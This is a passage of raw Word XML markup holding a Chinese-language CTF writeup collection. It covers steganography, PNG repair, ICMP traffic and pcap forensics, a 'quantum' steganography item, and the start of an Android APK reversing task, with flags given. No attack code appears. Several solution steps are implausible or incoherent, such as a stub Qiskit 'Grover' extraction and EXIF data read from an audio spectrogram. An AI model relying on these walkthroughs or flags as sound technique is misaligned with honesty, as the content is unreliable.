      </w:r>
    </w:p>
    <w:p w14:paraId="4EA2A516" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>复制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A40E97" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>zsteg -a quantum_art.png &gt; output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D08947" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>cat output | grep 'B8G1' | base100 -d &gt; stage2.bf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F3B24" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>brainfuck stage2.bf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB36C0F" w14:textId="77777777" w:rsidR="004732E2" w:rsidRDefault="00C97809" w:rsidP="004732E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{Qu4ntum_St3g4n0_3x1ts}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB1ABD1" w14:textId="18F2ACCC" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00BF0316">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc190815139"/>
      <w:r w:rsidRPr="00040101">
        <w:t>时空漂流瓶（基础文件分析）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="61196C8E" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00040101">
        <w:br/>
        <w:t>提供损坏的bottle.zip压缩包，解压后包含：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2766788D" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>broken.png（缺少IHDR块的PNG文件）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B8175" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>message.wav（含摩尔斯电码的音频）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D121CE1" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>技术要点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEAA021" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>使用hex编辑器修复PNG文件头（参考1的PNG修复方法）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760DFB42" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116D1B0D" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>00000000: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52  // 补全缺失的IHDR块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B36FCE" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>修复后的二维码扫描得到提示：“CHECK_EXIF”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD50082" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>分析WAV文件的频谱图发现EXIF隐藏信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358170CA" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D0CF12" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>exiftool broken.png | grep Comment  # 输出：BASE64(3Nf0rM@t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BE81DA" w14:textId="492C7B2F" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>对音频进行base58解码获得flag：flag{Tim3_Trav3l3r}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDB2432" w14:textId="5E6AF969" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="008D417C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc190815140"/>
      <w:r w:rsidRPr="00040101">
        <w:t>黑洞日志（流量分析）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="0B0879F1" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>题目原型</w:t>
      </w:r>
      <w:r w:rsidRPr="00040101">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00040101">
        <w:lastRenderedPageBreak/>
        <w:t>提供capture.pcapng文件，包含：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3ADC0E" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>USB键盘流量（HID Data）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7018E631" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>异常的ICMP大包传输</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643CF3B" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>被分割的base32字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7271AD6C" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关键检测点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1701C5" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>Wireshark过滤显示异常流量：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ABAE05" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>tshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FCC4A" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>tshark -r capture.pcapng -Y "icmp.type==8 &amp;&amp; frame.len&gt;1000" -T fields -e data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068CD787" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>提取ICMP负载中的像素数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643502B3" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B570C1" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB39340" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>packets = rdpcap('capture.pcapng')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2324D0C0" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>[p[ICMP].load for p in packets if len(p)&gt;1000]  # 输出PNG文件碎片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566908B3" w14:textId="46B8BFFD" w:rsidR="00040101" w:rsidRPr="00040101" w:rsidRDefault="00040101" w:rsidP="00990C4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040101">
        <w:t>重组后得到含二维码的图片，扫码获得flag：flag{Bl@ck_H0l3_Tr@nsm1t}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062E6D14" w14:textId="72AEA4A5" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00BE3524">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc190815141"/>
      <w:r w:rsidRPr="00C97809">
        <w:t>量子隐写术</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="3E1B5B41" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>[提供文件：quantum_audio.wav]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>这段音频文件中隐藏着量子加密信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A888EED" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>隐写层级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFEA6C" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>频谱图显示QR码片段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60310048" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>每个频段携带量子态信息（0/1）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E4BC32" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>需要Grover算法逆向搜索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C14B58A" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>提取命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31852DC6" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D39D913" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>复制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F498712" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>from qiskit import QuantumCircuit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CF76DD" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>qc = QuantumCircuit(8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FAE0A" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t># 构建量子Oracle...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4094807D" w14:textId="77777777" w:rsidR="00040101" w:rsidRPr="00C97809" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>print(qc.measure_all())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C12007F" w14:textId="77777777" w:rsidR="00040101" w:rsidRDefault="00040101" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{Qu4ntum_St3g4n0gr4phy}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38438596" w14:textId="77777777" w:rsidR="00AC3439" w:rsidRPr="00C97809" w:rsidRDefault="00AC3439" w:rsidP="00AC3439">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc190815142"/>
      <w:r w:rsidRPr="00C97809">
        <w:t>被删除的会议记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="11689E84" w14:textId="77777777" w:rsidR="00AC3439" w:rsidRPr="00C97809" w:rsidRDefault="00AC3439" w:rsidP="00AC3439">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>[提供文件：meeting.pcapng]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>从网络流量中恢复被删除的Word文档，找到隐藏文字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7595F9B4" w14:textId="77777777" w:rsidR="00AC3439" w:rsidRPr="00C97809" w:rsidRDefault="00AC3439" w:rsidP="00AC3439">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>取证线索</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 存在SMB2文件传输记录</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 使用XOR 0xAA进行文档碎片伪装</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 文档结构包含OLE隐写层</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159960BC" w14:textId="77777777" w:rsidR="00AC3439" w:rsidRPr="00C97809" w:rsidRDefault="00AC3439" w:rsidP="00AC3439">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>恢复步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3820C6F7" w14:textId="77777777" w:rsidR="00AC3439" w:rsidRPr="00C97809" w:rsidRDefault="00AC3439" w:rsidP="00AC3439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>提取TCP流5932的载荷数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7DD42F" w14:textId="77777777" w:rsidR="00AC3439" w:rsidRPr="00C97809" w:rsidRDefault="00AC3439" w:rsidP="00AC3439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:lastRenderedPageBreak/>
        <w:t>逆向XOR加密后的DOC文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624202D6" w14:textId="77777777" w:rsidR="00AC3439" w:rsidRPr="00C97809" w:rsidRDefault="00AC3439" w:rsidP="00AC3439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>使用olevba提取隐藏宏代码：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>MsgBox "flag{PC4P_4n4lys1s_F0rens1cs}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0068319A" w14:textId="7CC04B55" w:rsidR="00AC3439" w:rsidRDefault="00AC3439" w:rsidP="00040101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{PC4P_4n4lys1s_F0rens1cs}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC9F74" w14:textId="1A630F8D" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00666B44" w:rsidP="00666B44">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc190815143"/>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mobile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="39C4149F" w14:textId="24E12B38" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00DE0ACB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc190815144"/>
      <w:r w:rsidRPr="00C97809">
        <w:t>火星探测器控制App</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="3257E457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题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>[提供文件：MarsRover.apk]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>分析这个Android应用的控制协议，找到隐藏在系统日志中的登陆凭证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DFA981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关键线索</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 使用JNI实现核心加密逻辑</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 通过WebSocket发送base64编码的控制指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 存在调试模式未关闭的日志泄漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76BA24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解题步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFCFB9" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>反编译发现Native库librover.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77609B1C" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>IDA分析加密函数：XOR 0x7F + ROL 3</w:t>
      </w:r>
    </w:p>
